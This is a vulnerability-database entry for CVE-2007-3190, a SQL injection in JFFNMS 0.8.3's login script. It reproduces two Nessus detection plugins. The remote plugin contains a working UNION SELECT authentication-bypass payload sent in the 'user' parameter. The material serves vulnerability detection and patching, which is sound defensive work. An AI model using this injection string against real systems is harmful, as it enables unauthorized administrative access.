Vulnerabilities > CVE-2007-3190 - Remote vulnerability in Jffnms Just for FUN Network Management System 0.8.3

047910
CVSS 6.8 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
jffnms
nessus
exploit available

Summary

Multiple SQL injection vulnerabilities in auth.php in Just For Fun Network Management System (JFFNMS) 0.8.3, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) user and (2) pass parameters.

Vulnerable Configurations

Part Description Count
Application
Jffnms
1

Exploit-Db

descriptionJFFNMS 0.8.3 auth.php Multiple Parameter SQL Injection. CVE-2007-3190. Webapps exploit for php platform
idEDB-ID:30171
last seen2016-02-03
modified2007-06-11
published2007-06-11
reporterTim Brown
sourcehttps://www.exploit-db.com/download/30171/
titleJFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection

Nessus

  • NASL familyCGI abuses
    NASL idJFFNMS_USER_SQL_INJECTION.NASL
    descriptionThe remote host is running JFFNMS, an open source network management and monitoring system. The version of JFFNMS on the remote host fails to properly sanitize user-supplied input to the
    last seen2020-06-01
    modified2020-06-02
    plugin id25461
    published2007-06-12
    reporterThis script is Copyright (C) 2007-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/25461
    titleJFFNMS auth.php Multiple Parameter SQL Injection
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # Remote check for CVE-2007-3190 in JFFNMS: sends one crafted 'user' value
    # to the login handler and reports the host when the response indicates
    # the login was accepted without valid credentials.
    
    include("compat.inc");
    
    # Plugin registration. When the scanner only wants metadata it sets
    # 'description'; the script then registers its attributes and exits
    # before any network traffic is generated (standard NASL layout).
    if (description)
    {
      script_id(25461);
      script_version("1.23");
    
      script_cve_id("CVE-2007-3190");
      script_bugtraq_id(24414);
    
      script_name(english:"JFFNMS auth.php Multiple Parameter SQL Injection");
      script_summary(english:"Tries to generate a SQL error");
    
     script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a PHP script that is prone to a SQL
    injection attack." );
     script_set_attribute(attribute:"description", value:
    "The remote host is running JFFNMS, an open source network management
    and monitoring system. 
    
    The version of JFFNMS on the remote host fails to properly sanitize
    user-supplied input to the 'user' parameter before using it in the
    'lib/api.classes.inc.php' script in database queries.  If PHP's
    'magic_quotes_gpc' setting is disabled, an unauthenticated, remote
    attacker can leverage this issue to launch SQL injection attacks
    against the affected application, including bypassing authentication
    and gaining administrative access to it." );
     script_set_attribute(attribute:"see_also", value:"https://www.nth-dimension.org.uk/pub/NDSA20070524.txt.asc" );
     script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2007/Jun/217" );
     script_set_attribute(attribute:"solution", value:
    "Upgrade to JFFNMS version 0.8.4-pre3 or later." );
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N");
     script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"true");
     script_set_attribute(attribute:"plugin_publication_date", value: "2007/06/12");
     script_set_attribute(attribute:"vuln_publication_date", value: "2007/06/10");
     script_cvs_date("Date: 2018/11/15 20:50:17");
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_set_attribute(attribute:"cpe", value:"cpe:/a:jffnms:just_for_fun_network_management_system");
    script_end_attributes();
    
    
      # ACT_ATTACK: this plugin actively sends the injection string to the
      # target rather than inferring the flaw from a version banner.
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");
    
      script_dependencies("http_version.nasl");
      script_exclude_keys("Settings/disable_cgi_scanning");
      script_require_ports("Services/www", 80);
      script_require_keys("www/PHP");
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("url_func.inc");
    
    
    # Locate the web port; nothing to do if that server cannot host PHP.
    port = get_http_port(default:80, embedded: 0);
    if (!can_host_php(port:port)) exit(0);
    
    
    # Loop through various directories.
    # '/jffnms' is only added in thorough mode; otherwise only the generic
    # CGI directories discovered by earlier plugins are probed.
    if (thorough_tests) dirs = list_uniq(make_list("/jffnms", cgi_dirs()));
    else dirs = make_list(cgi_dirs());
    
    foreach dir (dirs)
    {
      # Try to exploit the SQL injection flaw to bypass authentication.
      # SCRIPT_NAME is prepended to the injected 'user' value, so a defender
      # reviewing web-server logs can attribute this probe to the scanner.
      user = string(SCRIPT_NAME, "' UNION SELECT 2,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'--");
      pass = "";
    
      # GET <dir>/?user=<payload>&file=index&pass=  -- 'user' is URL-encoded,
      # 'pass' is sent as-is (it is always empty here).
      w = http_send_recv3(method:"GET",
        item:string(
          dir, "/?",
          "user=", urlencode(str:user), "&",
          "file=index&",
          "pass=", pass
        ), 
        port:port
      );
      # No answer at all aborts the whole plugin, not just this directory.
      if (isnull(w)) exit(1, "The web server on port "+port+" did not answer.");
      # w[0]/w[1]/w[2] are the status line, headers and body; join them so
      # the markers below are searched across the entire response.
      res = strcat(w[0], w[1], '\r\n', w[2]);
    
      # If...
      if (
        # the output looks like it's from JFFNMS and...
        ("jffnms=" >< res || "is part of JFFNMS" >< res) &&
        # we get a link to the admin menu
        # (presumably only rendered for an authenticated admin session, so
        # its presence is taken as proof that the injected login succeeded)
        "src='admin/menu.php" >< res
      )
      {
        # Report the host, record the finding for dependent plugins, and
        # stop after the first vulnerable directory.
        security_hole(port);
        set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
        exit(0);
      }
    }
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-1374.NASL
    descriptionSeveral vulnerabilities have been discovered in jffnms, a web-based Network Management System for IP networks. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2007-3189 Cross-site scripting (XSS) vulnerability in auth.php, which allows a remote attacker to inject arbitrary web script or HTML via the
    last seen2020-06-01
    modified2020-06-02
    plugin id26035
    published2007-09-14
    reporterThis script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/26035
    titleDebian DSA-1374-1 : jffnms - several vulnerabilities
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-1374. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    # Local (dpkg-based) check: flags a Debian etch host whose installed
    # jffnms package is older than the version fixed by DSA-1374.
    
    include("compat.inc");
    
    # Plugin registration. When the scanner only wants metadata it sets
    # 'description'; the script registers its attributes and exits here.
    if (description)
    {
      script_id(26035);
      script_version("1.14");
      script_cvs_date("Date: 2019/08/02 13:32:20");
    
      # NOTE(review): the CVE registered here (CVE-2007-3191) is not among
      # the identifiers named in the description text below (CVE-2007-3189,
      # CVE-2007-3190, CVE-2007-3192) -- confirm the intended cross-reference.
      script_cve_id("CVE-2007-3191");
      script_xref(name:"DSA", value:"1374");
    
      script_name(english:"Debian DSA-1374-1 : jffnms - several vulnerabilities");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Several vulnerabilities have been discovered in jffnms, a web-based
    Network Management System for IP networks. The Common Vulnerabilities
    and Exposures project identifies the following problems :
    
      - CVE-2007-3189
        Cross-site scripting (XSS) vulnerability in auth.php,
        which allows a remote attacker to inject arbitrary web
        script or HTML via the'user' parameter.
    
      - CVE-2007-3190
        Multiple SQL injection vulnerabilities in auth.php,
        which allow remote attackers to execute arbitrary SQL
        commands via the'user' and 'pass' parameters.
    
      - CVE-2007-3192
        Direct requests to URLs make it possible for remote
        attackers to access configuration information, bypassing
        login restrictions."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security-tracker.debian.org/tracker/CVE-2007-3189"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security-tracker.debian.org/tracker/CVE-2007-3190"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security-tracker.debian.org/tracker/CVE-2007-3192"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2007/dsa-1374"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the jffnms package.
    
    For the stable distribution (etch), these problems have been fixed in
    version 0.8.3dfsg.1-2.1etch1."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:jffnms");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:4.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2007/09/11");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/09/14");
      script_end_attributes();
    
      # ACT_GATHER_INFO: this check only reads package data collected over
      # SSH; it sends nothing to the vulnerable application itself.
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    # Prerequisites: local checks enabled, the host identified as Debian, and
    # a 'dpkg -l' listing available in the knowledge base.
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    # 'flag' counts packages found below the fixed version; deb_check()
    # compares the installed jffnms on etch (4.0) against the DSA reference.
    flag = 0;
    if (deb_check(release:"4.0", prefix:"jffnms", reference:"0.8.3dfsg.1-2.1etch1")) flag++;
    
    # Report with the package/version details when verbose output is on,
    # otherwise just flag the host; an up-to-date host is audited as unaffected.
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");